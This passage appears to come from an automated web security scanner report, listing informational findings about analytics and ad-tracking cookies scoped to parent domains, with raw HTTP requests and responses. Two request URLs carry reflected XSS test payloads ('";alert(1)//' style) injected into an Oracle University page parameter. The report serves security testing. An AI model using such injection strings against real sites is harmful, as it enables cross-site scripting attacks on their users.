d=functiononclick%28event%29%7Bjavascript%3Adocument.searchForm.keyword.value%3D%27%27%7D&oidt=2&ot=TEXT&AQE=1 HTTP/1.1
Host: oracleglobal.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://search.oracle.com/search/search?default=true&keyword=phone&start=1&nodeid=&fid=&showSimilarDoc=true&group=All
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_x60bafx7Bzx7Djx21x7Cax7Fncc=[CS]v4|272F18FF05010599-4000010960230D66|4E5E718E[CE]; s_vi_ax60sji=[CS]v4|272FD7BC85162345-400001A0C03A9C55|4E5FAF78[CE]; s_vi_efhcjygdx7Fx7Fn=[CS]v4|273164FE850113DC-40000109C022AF4B|4E62C9FC[CE]; s_vi_bax7Fmox7Emaibxxc=[CS]v4|2731656D85013995-4000010FA019802E|4E62CAD6[CE]; s_vi_hizx7Dx7Bix7Fxxjyx60x60=[CS]v4|2732F4C385012B37-4000010D6023C03D|4E65E986[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|0-0|4E664230[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:54:34 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_cx7Emox60ikx60cnmx60=[CS]v4|2733211D05010D53-4000010EC0480BA8|4E664230[CE]; Expires=Sun, 4 Sep 2016 15:54:34 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_fx7Bhjeljfd=[CS]v4|2733211C85012E40-60000109C00668AA|4E664230[CE]; Expires=Sun, 4 Sep 2016 15:54:34 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Mon, 05 Sep 2011 15:54:34 GMT
Last-Modified: Wed, 07 Sep 2011 15:54:34 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E66423A-1A91-321F443B"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www118
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

12.37. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oracleuniversity/1/H.19.4/s15873635162025 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oracleglobal.112.2o7.net
Path:	/b/ss/oracleglobal,oracleuniversity/1/H.19.4/s15873635162025

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

s_vi_cx7Emox60ikx60cnmx60=[CS]v4|273321F405158E8D-6000017680001136|4E6643E7[CE]; Expires=Sun, 4 Sep 2016 16:02:24 GMT; Domain=.2o7.net; Path=/
s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|273321F405158E8D-6000017680001134|4E6643E7[CE]; Expires=Sun, 4 Sep 2016 16:02:24 GMT; Domain=.2o7.net; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /b/ss/oracleglobal,oracleuniversity/1/H.19.4/s15873635162025?AQB=1&ndh=1&t=6/8/2011%2016%3A2%3A20%202%20300&pageName=OUP%3A%201001%3A%20US%3A%20Oracle%20University%20%28db_pages.getpage%3Fpage_id%3D501%29&g=http%3A//education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage%3Fpage_id%3D501&r=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&cc=USD&ch=Search%20Test&c20=New&v20=New&c22=%28db_pages.getpage%3Fpage_id%3D501%29&c38=Non%20CMP%20-%20OUP%3A%201001%3A%20US%3A%20Oracle%20University%20%28db_pages.getpage%3Fpage_id%3D501%29&c39=Non%20CMP%20-%20OUP%3A%201001%3A%20US%3A%20Oracle%20University%20%28db_pages.getpage%3Fpage_id%3D501%29&s=1920x1200&c=16&j=1.7&v=Y&k=Y&bw=1069&bh=853&p=Mozilla%20Default%20Plug-in%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BGoogle%20Earth%20Plugin%3BJava%28TM%29%20Platform%20SE%206%20U26%3BJava%20Deployment%20Toolkit%206.0.260.3%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BWPI%20Detector%201.4%3BGoogle%20Updater%3BQuickTime%20Plug-in%207.7%3B&AQE=1 HTTP/1.1
Host: oracleglobal.112.2o7.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=501
Cookie: s_vi_rrswx7Cx7Frqx7Cx7Eugctuf=[CS]v4|271C9A0205013AFB-6000010B000D5654|4E393403[CE]; s_vi_x7Cgmlox60glm=[CS]v4|271C9A0205013AFB-6000010B000D5657|4E393403[CE]; s_vi_cdgx7Fsu=[CS]v4|271CCE90851604FB-400001A5E000FC45|4E399D20[CE]; s_vi_lex7Fihxxx7Fx7Cgiq=[CS]v4|2727EC2905010CA8-6000011460164A05|4E4FD852[CE]; s_vi_lex7Fihxxx7Fx7Chxxc=[CS]v4|2727ECDB05010F60-600001068035C75A|4E4FD9B3[CE]; s_vi_kx7Cmx7Cix7Edx7Fx7Fbixx=[CS]v4|2727F38685162CE5-40000183603608D2|4E500D14[CE]; s_vi_jcyonx7Eyjabola=[CS]v4|2727F4A185010391-40000101C018DBF5|4E500D13[CE]; s_vi_dinydefxxelh=[CS]v4|272A27560501363F-40000104C0125943|4E544EA8[CE]; s_vi_hizx7Dx7Bix7Fxxjyx60x60=[CS]v4|2732F7FB8515A3B5-600001750000D6D3|4E65EFF6[CE]; s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|273321F405158E8D-6000017680001134|4E6643E7[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|273321F405158E8D-6000017680001136|4E6643E7[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:02:24 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_cx7Emox60ikx60cnmx60=[CS]v4|273321F405158E8D-6000017680001136|4E6643E7[CE]; Expires=Sun, 4 Sep 2016 16:02:24 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|273321F405158E8D-6000017680001134|4E6643E7[CE]; Expires=Sun, 4 Sep 2016 16:02:24 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Mon, 05 Sep 2011 16:02:24 GMT
Last-Modified: Wed, 07 Sep 2011 16:02:24 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E664410-12E6-6E8221CD"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www116
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

12.38. http://oracleuniversity.112.2o7.net/b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s12042025583303 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oracleuniversity.112.2o7.net
Path:	/b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s12042025583303

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|273321F405158E8D-6000017680001134|4E6643E7[CE]; Expires=Sun, 4 Sep 2016 16:02:10 GMT; Domain=.2o7.net; Path=/
s_vi_cx7Emox60ikx60cnmx60=[CS]v4|273321F405158E8D-6000017680001136|4E6643E7[CE]; Expires=Sun, 4 Sep 2016 16:02:10 GMT; Domain=.2o7.net; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s12042025583303?[AQB]&ndh=1&t=6/8/2011%2016%3A2%3A9%202%20300&g=http%3A//education.oracle.com/pls/web_prod-plq-dad/webreg_course_index.main%3Fp_org_id%3D1001%26p_lang%3DUScd6e2&r=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&cc=USD&s=1920x1200&c=16&j=1.3&v=Y&k=Y&bw=1069&bh=772&p=Mozilla%20Default%20Plug-in%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BGoogle%20Earth%20Plugin%3BJava%28TM%29%20Platform%20SE%206%20U26%3BJava%20Deployment%20Toolkit%206.0.260.3%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BWPI%20Detector%201.4%3BGoogle%20Updater%3BQuickTime%20Plug-in%207.7%3B&[AQE] HTTP/1.1
Host: oracleuniversity.112.2o7.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://education.oracle.com/pls/web_prod-plq-dad/webreg_course_index.main?p_org_id=1001&p_lang=UScd6e2
Cookie: s_vi_rrswx7Cx7Frqx7Cx7Eugctuf=[CS]v4|271C9A0205013AFB-6000010B000D5654|4E393403[CE]; s_vi_x7Cgmlox60glm=[CS]v4|271C9A0205013AFB-6000010B000D5657|4E393403[CE]; s_vi_cdgx7Fsu=[CS]v4|271CCE90851604FB-400001A5E000FC45|4E399D20[CE]; s_vi_lex7Fihxxx7Fx7Cgiq=[CS]v4|2727EC2905010CA8-6000011460164A05|4E4FD852[CE]; s_vi_lex7Fihxxx7Fx7Chxxc=[CS]v4|2727ECDB05010F60-600001068035C75A|4E4FD9B3[CE]; s_vi_kx7Cmx7Cix7Edx7Fx7Fbixx=[CS]v4|2727F38685162CE5-40000183603608D2|4E500D14[CE]; s_vi_jcyonx7Eyjabola=[CS]v4|2727F4A185010391-40000101C018DBF5|4E500D13[CE]; s_vi_dinydefxxelh=[CS]v4|272A27560501363F-40000104C0125943|4E544EA8[CE]; s_vi_hizx7Dx7Bix7Fxxjyx60x60=[CS]v4|2732F7FB8515A3B5-600001750000D6D3|4E65EFF6[CE]; s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|273321F405158E8D-6000017680001134|4E6643E7[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|273321F405158E8D-6000017680001136|4E6643E7[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:02:10 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|273321F405158E8D-6000017680001134|4E6643E7[CE]; Expires=Sun, 4 Sep 2016 16:02:10 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_cx7Emox60ikx60cnmx60=[CS]v4|273321F405158E8D-6000017680001136|4E6643E7[CE]; Expires=Sun, 4 Sep 2016 16:02:10 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Mon, 05 Sep 2011 16:02:10 GMT
Last-Modified: Wed, 07 Sep 2011 16:02:10 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E664402-4052-4A49592A"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www362
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

12.39. http://oracleuniversity.112.2o7.net/b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s17226938849569 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oracleuniversity.112.2o7.net
Path:	/b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s17226938849569

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|273321F40515867E-40000175C00034AB|4E6643E7[CE]; Expires=Sun, 4 Sep 2016 16:01:44 GMT; Domain=.2o7.net; Path=/
s_vi_cx7Emox60ikx60cnmx60=[CS]v4|273321F40515867E-40000175C00034AE|4E6643E7[CE]; Expires=Sun, 4 Sep 2016 16:01:44 GMT; Domain=.2o7.net; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s17226938849569?[AQB]&ndh=1&t=6/8/2011%2016%3A1%3A43%202%20300&g=http%3A//education.oracle.com/pls/web_prod-plq-dad/webreg_course_index.main%3Fp_org_id%3D1001%26p_lang%3DUScd6e2&r=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&cc=USD&s=1920x1200&c=16&j=1.3&v=Y&k=Y&bw=1069&bh=772&p=Mozilla%20Default%20Plug-in%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BGoogle%20Earth%20Plugin%3BJava%28TM%29%20Platform%20SE%206%20U26%3BJava%20Deployment%20Toolkit%206.0.260.3%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BWPI%20Detector%201.4%3BGoogle%20Updater%3BQuickTime%20Plug-in%207.7%3B&[AQE] HTTP/1.1
Host: oracleuniversity.112.2o7.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://education.oracle.com/pls/web_prod-plq-dad/webreg_course_index.main?p_org_id=1001&p_lang=UScd6e2
Cookie: s_vi_rrswx7Cx7Frqx7Cx7Eugctuf=[CS]v4|271C9A0205013AFB-6000010B000D5654|4E393403[CE]; s_vi_x7Cgmlox60glm=[CS]v4|271C9A0205013AFB-6000010B000D5657|4E393403[CE]; s_vi_cdgx7Fsu=[CS]v4|271CCE90851604FB-400001A5E000FC45|4E399D20[CE]; s_vi_lex7Fihxxx7Fx7Cgiq=[CS]v4|2727EC2905010CA8-6000011460164A05|4E4FD852[CE]; s_vi_lex7Fihxxx7Fx7Chxxc=[CS]v4|2727ECDB05010F60-600001068035C75A|4E4FD9B3[CE]; s_vi_kx7Cmx7Cix7Edx7Fx7Fbixx=[CS]v4|2727F38685162CE5-40000183603608D2|4E500D14[CE]; s_vi_jcyonx7Eyjabola=[CS]v4|2727F4A185010391-40000101C018DBF5|4E500D13[CE]; s_vi_dinydefxxelh=[CS]v4|272A27560501363F-40000104C0125943|4E544EA8[CE]; s_vi_hizx7Dx7Bix7Fxxjyx60x60=[CS]v4|2732F7FB8515A3B5-600001750000D6D3|4E65EFF6[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:01:44 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|273321F40515867E-40000175C00034AB|4E6643E7[CE]; Expires=Sun, 4 Sep 2016 16:01:44 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_cx7Emox60ikx60cnmx60=[CS]v4|273321F40515867E-40000175C00034AE|4E6643E7[CE]; Expires=Sun, 4 Sep 2016 16:01:44 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Mon, 05 Sep 2011 16:01:44 GMT
Last-Modified: Wed, 07 Sep 2011 16:01:44 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E6643E8-0CDE-17D956AD"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www374
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

12.40. http://oracleuniversity.112.2o7.net/b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s17973330883993 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oracleuniversity.112.2o7.net
Path:	/b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s17973330883993

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|273321F405158E8D-6000017680001134|4E6643E7[CE]; Expires=Sun, 4 Sep 2016 16:02:32 GMT; Domain=.2o7.net; Path=/
s_vi_cx7Emox60ikx60cnmx60=[CS]v4|273321F405158E8D-6000017680001136|4E6643E7[CE]; Expires=Sun, 4 Sep 2016 16:02:32 GMT; Domain=.2o7.net; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s17973330883993?[AQB]&ndh=1&t=6/8/2011%2016%3A2%3A31%202%20300&pageName=OUP%3A%201001%3A%20UScd6e276780&g=http%3A//education.oracle.com/pls/web_prod-plq-dad/webreg_course_index.main%3Fp_org_id%3D1001%26p_lang%3DUScd6e276780%2522%253balert%281%29//43d7466ae8e&r=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&ch=Show%20Desc%20Dynamic%20Page&cc=USD&s=1920x1200&c=16&j=1.3&v=Y&k=Y&bw=1069&bh=853&p=Mozilla%20Default%20Plug-in%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BGoogle%20Earth%20Plugin%3BJava%28TM%29%20Platform%20SE%206%20U26%3BJava%20Deployment%20Toolkit%206.0.260.3%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BWPI%20Detector%201.4%3BGoogle%20Updater%3BQuickTime%20Plug-in%207.7%3B&[AQE] HTTP/1.1
Host: oracleuniversity.112.2o7.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://education.oracle.com/pls/web_prod-plq-dad/webreg_course_index.main?p_org_id=1001&p_lang=UScd6e276780%22%3balert(1)//43d7466ae8e
Cookie: s_vi_rrswx7Cx7Frqx7Cx7Eugctuf=[CS]v4|271C9A0205013AFB-6000010B000D5654|4E393403[CE]; s_vi_x7Cgmlox60glm=[CS]v4|271C9A0205013AFB-6000010B000D5657|4E393403[CE]; s_vi_cdgx7Fsu=[CS]v4|271CCE90851604FB-400001A5E000FC45|4E399D20[CE]; s_vi_lex7Fihxxx7Fx7Cgiq=[CS]v4|2727EC2905010CA8-6000011460164A05|4E4FD852[CE]; s_vi_lex7Fihxxx7Fx7Chxxc=[CS]v4|2727ECDB05010F60-600001068035C75A|4E4FD9B3[CE]; s_vi_kx7Cmx7Cix7Edx7Fx7Fbixx=[CS]v4|2727F38685162CE5-40000183603608D2|4E500D14[CE]; s_vi_jcyonx7Eyjabola=[CS]v4|2727F4A185010391-40000101C018DBF5|4E500D13[CE]; s_vi_dinydefxxelh=[CS]v4|272A27560501363F-40000104C0125943|4E544EA8[CE]; s_vi_hizx7Dx7Bix7Fxxjyx60x60=[CS]v4|2732F7FB8515A3B5-600001750000D6D3|4E65EFF6[CE]; s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|273321F405158E8D-6000017680001134|4E6643E7[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|273321F405158E8D-6000017680001136|4E6643E7[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:02:32 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|273321F405158E8D-6000017680001134|4E6643E7[CE]; Expires=Sun, 4 Sep 2016 16:02:32 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_cx7Emox60ikx60cnmx60=[CS]v4|273321F405158E8D-6000017680001136|4E6643E7[CE]; Expires=Sun, 4 Sep 2016 16:02:32 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Mon, 05 Sep 2011 16:02:32 GMT
Last-Modified: Wed, 07 Sep 2011 16:02:32 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E664418-4A55-7F3D450F"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www598
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

12.41. http://oracleuniversity.112.2o7.net/b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s18104473613862 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oracleuniversity.112.2o7.net
Path:	/b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s18104473613862

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|273321F405158E8D-6000017680001134|4E6643E7[CE]; Expires=Sun, 4 Sep 2016 16:03:43 GMT; Domain=.2o7.net; Path=/
s_vi_cx7Emox60ikx60cnmx60=[CS]v4|273321F405158E8D-6000017680001136|4E6643E7[CE]; Expires=Sun, 4 Sep 2016 16:03:43 GMT; Domain=.2o7.net; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s18104473613862?[AQB]&ndh=1&t=6/8/2011%2016%3A3%3A42%202%20300&pageName=OUP%3A%201001%3A%20UScd6e276780&g=http%3A//education.oracle.com/pls/web_prod-plq-dad/webreg_course_index.main%3Fp_org_id%3D1001%26p_lang%3DUScd6e276780%2522%253balert%28document.location%29//43d7466ae8e&r=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&ch=Show%20Desc%20Dynamic%20Page&cc=USD&s=1920x1200&c=16&j=1.3&v=Y&k=Y&bw=1069&bh=853&p=Mozilla%20Default%20Plug-in%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BGoogle%20Earth%20Plugin%3BJava%28TM%29%20Platform%20SE%206%20U26%3BJava%20Deployment%20Toolkit%206.0.260.3%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BWPI%20Detector%201.4%3BGoogle%20Updater%3BQuickTime%20Plug-in%207.7%3B&[AQE] HTTP/1.1
Host: oracleuniversity.112.2o7.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://education.oracle.com/pls/web_prod-plq-dad/webreg_course_index.main?p_org_id=1001&p_lang=UScd6e276780%22%3balert(document.location)//43d7466ae8e
Cookie: s_vi_rrswx7Cx7Frqx7Cx7Eugctuf=[CS]v4|271C9A0205013AFB-6000010B000D5654|4E393403[CE]; s_vi_x7Cgmlox60glm=[CS]v4|271C9A0205013AFB-6000010B000D5657|4E393403[CE]; s_vi_cdgx7Fsu=[CS]v4|271CCE90851604FB-400001A5E000FC45|4E399D20[CE]; s_vi_lex7Fihxxx7Fx7Cgiq=[CS]v4|2727EC2905010CA8-6000011460164A05|4E4FD852[CE]; s_vi_lex7Fihxxx7Fx7Chxxc=[CS]v4|2727ECDB05010F60-600001068035C75A|4E4FD9B3[CE]; s_vi_kx7Cmx7Cix7Edx7Fx7Fbixx=[CS]v4|2727F38685162CE5-40000183603608D2|4E500D14[CE]; s_vi_jcyonx7Eyjabola=[CS]v4|2727F4A185010391-40000101C018DBF5|4E500D13[CE]; s_vi_dinydefxxelh=[CS]v4|272A27560501363F-40000104C0125943|4E544EA8[CE]; s_vi_hizx7Dx7Bix7Fxxjyx60x60=[CS]v4|2732F7FB8515A3B5-600001750000D6D3|4E65EFF6[CE]; s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|273321F405158E8D-6000017680001134|4E6643E7[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|273321F405158E8D-6000017680001136|4E6643E7[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:03:43 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|273321F405158E8D-6000017680001134|4E6643E7[CE]; Expires=Sun, 4 Sep 2016 16:03:43 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_cx7Emox60ikx60cnmx60=[CS]v4|273321F405158E8D-6000017680001136|4E6643E7[CE]; Expires=Sun, 4 Sep 2016 16:03:43 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Mon, 05 Sep 2011 16:03:43 GMT
Last-Modified: Wed, 07 Sep 2011 16:03:43 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E66445F-60B9-40E5F551"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www368
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

12.42. http://p.brilig.com/contact/bct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://p.brilig.com
Path:	/contact/bct

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

BriligContact=57372788-c194-43c5-a151-713a1d7fc584; Domain=.brilig.com; Expires=Thu, 29-Aug-2041 15:00:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /contact/bct?pid=d6b47090-0a45-4cd9-8cf9-d1081a8879d8&_ct=pixel&REDIR=rt.legolas-media.com/lgrt?ci=1%26ti=12%26sti=28%26sts=1315321126439961%26sui=fb069b82-5953-4473-8ae5-0a80415bcdc8 HTTP/1.1
Host: p.brilig.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
Cookie: BriligContact=57372788-c194-43c5-a151-713a1d7fc584

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 06 Sep 2011 15:00:30 GMT
Server: Apache/2.2.14 (Ubuntu)
Pragma: no-cache
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Expires: Mon, 19 Dec 1983 15:00:30 GMT
Set-Cookie: BriligContact=57372788-c194-43c5-a151-713a1d7fc584; Domain=.brilig.com; Expires=Thu, 29-Aug-2041 15:00:30 GMT
Location: http://rt.legolas-media.com/lgrt?ci=1&ti=12&sti=28&sts=1315321126439961&sui=fb069b82-5953-4473-8ae5-0a80415bcdc8
Content-Length: 0
X-Brilig-D: D=3410
P3P: CP="NOI DSP COR CURo DEVo TAIo PSAo PSDo OUR BUS UNI COM"
Connection: close
Content-Type: text/plain

12.43. http://pi.pardot.com/analytics previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pi.pardot.com
Path:	/analytics

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

pi_opt_in1852=3c12a2182101972e2629218d; expires=Mon, 06-Sep-2021 15:33:53 GMT; path=/; domain=.pardot.com
visitor_id1852=191471275; expires=Mon, 06-Sep-2021 15:33:53 GMT; path=/; domain=.pardot.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /analytics?ver=3&visitor_id=191471185&pi_opt_in=&campaign_id=1407&account_id=2852&title=Ecommerce%20Storefront%20Software%20%7C%20Online%20Storefront%20Software&browser=Chrome&browser_version=13&operating_system=Windows&language=en-US&screen_height=1200&screen_width=1920&flash=true&java=true&url=http%3A%2F%2Fwww.znode.com%2Fznode-multifront%2Ffeature.aspx&referrer=http%3A%2F%2Fwww.znode.com%2Fznode-multifront%2Fdefault.aspx%3Fpi_ad_id%3D7270542494%26gclid%3DCLLul7r4iKsCFQVrgwodzysJ5Q HTTP/1.1
Host: pi.pardot.com
Proxy-Connection: keep-alive
Referer: http://www.znode.com/znode-multifront/feature.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
